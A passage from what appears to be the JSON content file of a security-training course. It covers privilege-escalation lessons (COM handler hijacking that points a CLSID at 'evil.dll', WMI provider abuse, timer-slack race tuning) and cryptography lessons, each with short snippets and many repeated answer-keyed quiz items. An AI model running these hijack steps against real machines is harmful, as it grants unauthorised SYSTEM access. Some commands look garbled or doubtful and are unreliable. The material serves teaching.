because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe-timerslack","cat":"Privilege Escalation","title":"Timer Slack and Scheduling Exploits","diff":5,"xp":300,"intro":"Exploit kernel timer granularity for TOCTOU race conditions in privileged operations.","sections":[{"type":"text","content":"Kernel timer slack affects the precision of time-based operations. Exploit this in race conditions against privileged file operations for reliable wins."},{"type":"code","lang":"bash","content":"# Reduce timer slack for tighter race windows\necho 1 > /proc/self/timerslack_ns\n# Improves success rate of TOCTOU exploits\n# Combined with CPU pinning and priority manipulation"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Timer slack affects exploits by...","opts":["Making them faster","Controlling race condition timing precision","Encrypting data","Changing permissions"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1}]},{"id":"pe-win-com-handler","cat":"Privilege Escalation","title":"COM Handler Hijacking","diff":4,"xp":250,"intro":"Register a COM handler that executes when a privileged process loads it.","sections":[{"type":"text","content":"Windows loads COM objects by CLSID. Registering your DLL for a CLSID used by a SYSTEM process gives you execution as SYSTEM."},{"type":"code","lang":"powershell","content":"# Find COM objects loaded by elevated processes\n# Monitor with ProcMon: filter Operation=RegOpenKey, Path contains InProcServer32\n# Hijack: create HKCU override\nNew-Item 'HKCU:SoftwareClassesCLSID{target-clsid}InProcServer32' -Force\nSet-ItemProperty 'HKCU:SoftwareClassesCLSID{target-clsid}InProcServer32' '(Default)' 'C:evil.dll'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"COM hijacking works because HKCU entries...","opts":["Are ignored","Take priority over HKLM for the current user","Require admin","Are encrypted"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe-win-wmi-persist","cat":"Privilege Escalation","title":"WMI Provider Escalation","diff":4,"xp":250,"intro":"Register a WMI provider DLL that runs in the SYSTEM context.","sections":[{"type":"text","content":"WMI providers run as SYSTEM in the WMI service process. Register a malicious provider and it executes with SYSTEM privileges on any WMI query."},{"type":"code","lang":"bash","content":"# WMI providers are loaded by wmiprvse.exe (SYSTEM)\n# Register a provider DLL\nmof2dll compile provider.mof\n# The provider's DLL loads next time the WMI class is queried"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"WMI providers execute as...","opts":["The querying user","SYSTEM (in wmiprvse.exe)","Network Service","Guest"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe-win-event-log","cat":"Privilege Escalation","title":"Event Log Service Exploitation","diff":5,"xp":300,"intro":"Exploit the Windows Event Log service for privilege escalation.","sections":[{"type":"text","content":"The Event Log service (eventlog) runs as SYSTEM and processes log entries. Crafted log entries or DLL loading vulnerabilities in the service provide SYSTEM execution."},{"type":"code","lang":"bash","content":"# Event Log service runs as LOCAL SERVICE / SYSTEM\n# Historical vulns: DLL side-loading in eventlog path\n# Check service permissions\nsc qc eventlog\naccesschk.exe -ucqv eventlog"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"The Windows Event Log service runs as...","opts":["User","SYSTEM or LOCAL SERVICE","Guest","Network"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"cr-substitution","cat":"Cryptography","title":"Substitution Cipher Analysis","diff":1,"xp":50,"intro":"Each letter maps to another \u2014 broken by frequency analysis.","sections":[{"type":"text","content":"Simple substitution: A->X, B->Q, etc. Since letter frequencies are preserved, count the most common letters and compare to English frequencies (E=12.7%, T=9.1%)."},{"type":"code","lang":"bash","content":"python3 -c '\nfrom collections import Counter\ncipher = open(\"cipher.txt\").read().upper()\nfor char, count in Counter(cipher).most_common(5):\n    print(f\"{char}: {count}\")\n# Compare to English: E(12.7%) T(9.1%) A(8.2%) O(7.5%)\n'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Substitution ciphers are broken by...","opts":["Brute force","Frequency analysis (letter frequency patterns)","Key guessing","Timing attacks"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"cr-aes-key-schedule","cat":"Cryptography","title":"AES Key Schedule Internals","diff":4,"xp":250,"intro":"How AES expands a 128/256-bit key into round keys.","sections":[{"type":"text","content":"AES key expansion uses SubBytes, RotWord, and Rcon to generate 10/14 round keys from the initial key. Related-key attacks target weaknesses in this expansion."},{"type":"code","lang":"bash","content":"# AES-128 key expansion:\n# 4 words (128 bits) -> 44 words (11 round keys)\n# Each new word = previous word XOR word from 4 positions back\n# Every 4th word: RotWord + SubBytes + Rcon\n# Related-key attacks exploit predictable relationships"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"AES key expansion uses which operations?","opts":["Only XOR","SubBytes, RotWord, Rcon, and XOR","Only shifting","Only substitution"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1}]},{"id":"cr-rc4-weaknesses","cat":"Cryptography","title":"RC4 Stream Cipher Weaknesses","diff":3,"xp":200,"intro":"RC4's key scheduling algorithm has biases that leak key bytes.","sections":[{"type":"text","content":"RC4's first bytes are biased \u2014 the second output byte has a significant probability of equaling zero. WEP used RC4 with a fixed key + incrementing IV, which led to its complete break."},{"type":"code","lang":"bash","content":"# RC4 biases:\n# P(2nd byte = 0) significantly higher than 1/256\n# Fluhrer-Mantin-Shamir attack on WEP\n# NOMORE attack on TLS with RC4\n# RC4 is now prohibited in TLS (RFC 7465)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"RC4 was broken in WEP because...","opts":["It's slow","A fixed key with incrementing IV created predictable keystreams","It uses too much memory","The key is too short"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1}]},{"id":"cr-gcm-nonce-reuse","cat":"Cryptography","title":"AES-GCM Nonce Reuse Catastrophe","diff":4,"xp":250,"intro":"Reusing a nonce in GCM is catastrophic \u2014 it reveals the authentication key.","sections":[{"type":"text","content":"GCM uses the nonce to derive the authentication hash key H. Reusing a nonce with different messages lets an attacker recover H, then forge valid authenticated ciphertexts."},{"type":"code","lang":"bash","content":"# If nonce is reused:\n# C1 = Enc(K, N, P1), Tag1 = GHASH(H, C1)\n# C2 = Enc(K, N, P2), Tag2 = GHASH(H, C2)\n# Attacker can solve for H (the auth key)\n# Then forge tags for arbitrary ciphertexts\n# Prevention: use random 96-bit nonces or a counter"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"GCM nonce reuse allows an attacker to...","opts":["Decrypt messages","Recover the authentication key and forge valid tags","Speed up encryption","Change the key"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt 